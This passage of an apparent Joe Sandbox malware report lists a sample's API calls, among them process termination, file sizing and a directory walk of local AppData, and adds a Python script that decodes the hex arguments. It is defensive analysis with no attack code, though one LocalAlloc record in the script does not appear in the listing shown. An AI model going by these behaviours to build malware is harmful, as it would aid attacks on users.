                  • Opcode Fuzzy Hash: 9839f718a494385f8a30ae95beeeb083b592baafc3ed53277c882f1cc9021c47
                  • Instruction Fuzzy Hash: 6B313EB5D10219ABCF04DBE4EC85FEFB7B8AB88304F144518F905A7285EB709A44CBA1
                  APIs
                  • memset.MSVCRT ref: 009394EB
                    • Part of subcall function 00938D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0093951E,00000000), ref: 00938D5B
                    • Part of subcall function 00938D50: RtlAllocateHeap.NTDLL(00000000), ref: 00938D62
                    • Part of subcall function 00938D50: wsprintfW.USER32 ref: 00938D78
                  • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009395AB
                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009395C9
                  • CloseHandle.KERNEL32(00000000), ref: 009395D6
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                  • String ID:
                  • API String ID: 3729781310-0
                  • Opcode ID: 42bbeb6e91cff503ea4fdcf4464f768bf8b19adac6fa5e76798b8551acc8d892
                  • Instruction ID: ccc32bbc4b9e9e8d8f61ba7102e26948a964abd9d17f89f0fc3b26d1130737d9
                  • Opcode Fuzzy Hash: 42bbeb6e91cff503ea4fdcf4464f768bf8b19adac6fa5e76798b8551acc8d892
                  • Instruction Fuzzy Hash: 7131F971A00208AFDF14DBE0DD49BEDB7B8EB44700F104459F506AB184DBB8AA89CF52
                  APIs
                  • CreateFileA.KERNEL32(00933AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00933AEE,?), ref: 009392FC
                  • GetFileSizeEx.KERNEL32(000000FF,00933AEE), ref: 00939319
                  • CloseHandle.KERNEL32(000000FF), ref: 00939327
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$CloseCreateHandleSize
                  • String ID:
                  • API String ID: 1378416451-0
                  • Opcode ID: d18e3bb6ee8e6635699ae001d0c43cfa3c23643ff0ca2e5caad06c85806d02df
                  • Instruction ID: 0266ed6d40d7f5d0cd59c99ab57d876215968eaa51b73bc5b4091141954084db
                  • Opcode Fuzzy Hash: d18e3bb6ee8e6635699ae001d0c43cfa3c23643ff0ca2e5caad06c85806d02df
                  • Instruction Fuzzy Hash: 5FF03775E44208BBDF10DBB0DC59BAE77B9BB48720F108654FA51A72C0DAB8AA018F41
                  APIs
                  • __getptd.LIBCMT ref: 0093C74E
                    • Part of subcall function 0093BF9F: __amsg_exit.LIBCMT ref: 0093BFAF
                  • __getptd.LIBCMT ref: 0093C765
                  • __amsg_exit.LIBCMT ref: 0093C773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0093C797
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: ac736d185d81e201477766f1e25ac46e6df123d46deddebe51f30e277fe607ef
                  • Instruction ID: b73a588170af642e0069e194238ee6129832b48ee7d210255137faa49392be1a
                  • Opcode Fuzzy Hash: ac736d185d81e201477766f1e25ac46e6df123d46deddebe51f30e277fe607ef
                  • Instruction Fuzzy Hash: 97F0BEB2908B009BD721BBB89807B5E33A0AF80724F204149FA0AB62D2CB645D419F56
                  APIs
                    • Part of subcall function 00938DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00934F7A
                  • lstrcat.KERNEL32(?,00941070), ref: 00934F97
                  • lstrcat.KERNEL32(?,01059040), ref: 00934FAB
                  • lstrcat.KERNEL32(?,00941074), ref: 00934FBD
                    • Part of subcall function 00934910: wsprintfA.USER32 ref: 0093492C
                    • Part of subcall function 00934910: FindFirstFileA.KERNEL32(?,?), ref: 00934943
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FDC), ref: 00934971
                    • Part of subcall function 00934910: StrCmpCA.SHLWAPI(?,00940FE0), ref: 00934987
                    • Part of subcall function 00934910: FindNextFileA.KERNEL32(000000FF,?), ref: 00934B7D
                    • Part of subcall function 00934910: FindClose.KERNEL32(000000FF), ref: 00934B92
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: aebdd2a381829860b4f6835d0f6bb4f934ce2821ff6c980ce59ac4837c732991
                  • Instruction ID: 888f7a5870411a518f3ca092e3371e10031d9b6e6c694d89a8e9aff4da38b7c7
                  • Opcode Fuzzy Hash: aebdd2a381829860b4f6835d0f6bb4f934ce2821ff6c980ce59ac4837c732991
                  • Instruction Fuzzy Hash: 2D21477690020467CB54F760EC46FEE337DABD4700F004554F65AA71C5EEB5A6C98F92
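The arguments in the API records above are printed as raw hex, so the behaviour of each function (OpenProcess with 0x1001 followed by TerminateProcess; CreateFileA with 0x80000000/3/3/0x80 followed by GetFileSizeEx; SHGetFolderPathA with CSIDL 0x1C feeding lstrcat and a FindFirstFileA/FindNextFileA loop; LocalAlloc with 0x40) is only clear once the constants are decoded. The Python below is an added analyst example, not code from the sample or from Joe Sandbox. It parses lines in the format this report uses, maps the argument positions from the documented Win32 prototypes, and leaves any value not in its tables as hex; the sample lines it carries are the ones printed in this section.

```python
# Added analyst example (not the sample's code, not Joe Sandbox code):
# decode the hex constants in Joe Sandbox "APIs" records so each function's
# behaviour is readable at a glance.  Argument positions follow the documented
# Win32 prototypes; values with no table entry stay as hex.
import re
from typing import Callable, Dict, List, Optional

_CALL = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")

PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0010: "PROCESS_VM_READ",
                  0x0400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x28: "CSIDL_PROFILE"}
LMEM = {0x02: "LMEM_MOVEABLE", 0x40: "LMEM_ZEROINIT"}   # LMEM_FIXED is 0, so 0x40 == LPTR


def _mask(table: Dict[int, str]) -> Callable[[int], str]:
    """Decoder for bit-flag arguments: names of the set bits, leftover bits as hex."""
    def decode(value: int) -> str:
        names, rest = [], value
        for bit, name in table.items():
            if value & bit == bit:
                names.append(name)
                rest &= ~bit
        if rest or not names:
            names.append(f"0x{rest:X}")
        return "|".join(names)
    return decode


def _enum(table: Dict[int, str]) -> Callable[[int], str]:
    """Decoder for enumeration arguments (one meaning per value)."""
    return lambda value: table.get(value, f"0x{value:X}")


# (API name, zero-based argument index) -> decoder
ANNOTATORS = {
    ("OpenProcess", 0): _mask(PROCESS_ACCESS),   # dwDesiredAccess
    ("CreateFileA", 1): _mask(GENERIC_ACCESS),   # dwDesiredAccess
    ("CreateFileA", 2): _mask(SHARE_MODE),       # dwShareMode
    ("CreateFileA", 4): _enum(CREATION),         # dwCreationDisposition
    ("CreateFileA", 5): _mask(FILE_ATTR),        # dwFlagsAndAttributes
    ("SHGetFolderPathA", 1): _enum(CSIDL),       # csidl
    ("LocalAlloc", 0): _mask(LMEM),              # uFlags
}


def parse_call(line: str) -> Optional[dict]:
    """Parse one 'Api.MODULE(args), ref: XXXX' line; None when it carries no call."""
    m = _CALL.search(line)
    if not m:
        return None            # e.g. 'wsprintfW.USER32 ref: ...' has no argument list
    api, module, argtext, ref = m.groups()
    args = [a.strip() for a in argtext.split(",")] if argtext.strip() else []
    notes = {}
    for i, a in enumerate(args):
        decoder = ANNOTATORS.get((api, i))
        if decoder and a != "?":   # '?' means Joe Sandbox could not resolve the value
            notes[i] = decoder(int(a, 16))
    return {"api": api, "module": module, "args": args, "ref": ref, "notes": notes}


def annotate(lines: List[str]) -> List[str]:
    """One readable line per recognised call, with decoded arguments substituted."""
    out = []
    for line in lines:
        rec = parse_call(line)
        if rec is None:
            continue
        shown = [rec["notes"].get(i, a) for i, a in enumerate(rec["args"])]
        out.append(f"{rec['api']}({', '.join(shown)}) @ {rec['ref']}")
    return out


# Records from this section, copied as Joe Sandbox printed them.
SECTION_CALLS = [
    "• LocalAlloc.KERNEL32(00000040,00000000), ref: 00929BA3",
    "• OpenProcess.KERNEL32(00001001,00000000,?), ref: 009395AB",
    "• TerminateProcess.KERNEL32(00000000,00000000), ref: 009395C9",
    "• CreateFileA.KERNEL32(00933AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00933AEE,?), ref: 009392FC",
    "• SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00938E0B",
    "• wsprintfW.USER32 ref: 00938D78",
]

if __name__ == "__main__":
    for text in annotate(SECTION_CALLS):
        print(text)
```

Read together, the decoded records say: the process-termination function opens targets with PROCESS_TERMINATE|PROCESS_QUERY_LIMITED_INFORMATION (the minimum needed to kill a process whose name was formatted with wsprintfW), the file function opens with GENERIC_READ and full read/write sharing so it can size files another process still holds open, and the directory walk starts from CSIDL_LOCAL_APPDATA. The trailing arguments Joe Sandbox prints beyond a prototype's arity are stack slots, which is why the tables are indexed by position rather than by count.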